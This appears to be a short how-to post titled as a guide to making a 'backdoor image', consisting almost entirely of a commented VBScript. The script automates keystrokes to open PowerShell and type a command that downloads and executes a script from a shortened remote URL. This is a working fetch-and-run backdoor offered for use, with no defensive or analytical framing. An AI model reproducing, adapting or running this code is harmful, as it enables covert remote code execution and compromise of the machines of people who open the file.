MASIGNCLEAN101

How to create a backdoor image using VBS Script

VBS Script : 


' Create a WScript.Shell object to automate tasks

Set WshShell = WScript.CreateObject("WScript.Shell")


' Simulate pressing Ctrl+Esc to open the Start menu

WshShell.SendKeys "^{ESC}"


' Introduce a 1-second pause for the Start menu to appear

WScript.Sleep 1000


' Simulate typing "Powershell" in the search box

WshShell.SendKeys "Powershell"


' Introduce a 0.5-second delay to allow search results to appear

WScript.Sleep 500


' Simulate pressing Enter to execute the search for "Powershell"

WshShell.SendKeys "{Enter}"


' Introduce a 1.5-second delay to allow PowerShell to start

WScript.Sleep 1500


' Simulate typing a potentially dangerous PowerShell command to download and execute a script from a remote URL

WshShell.SendKeys "iex {(}New-Object Net.WebClient{)}.DownloadString{(}'http://bit.ly/rRpwSh'{)}"


' Introduce a short 0.1-second delay to ensure the last keypress is processed

WScript.Sleep 100


' Simulate pressing Enter to execute the PowerShell command

WshShell.SendKeys "{Enter}"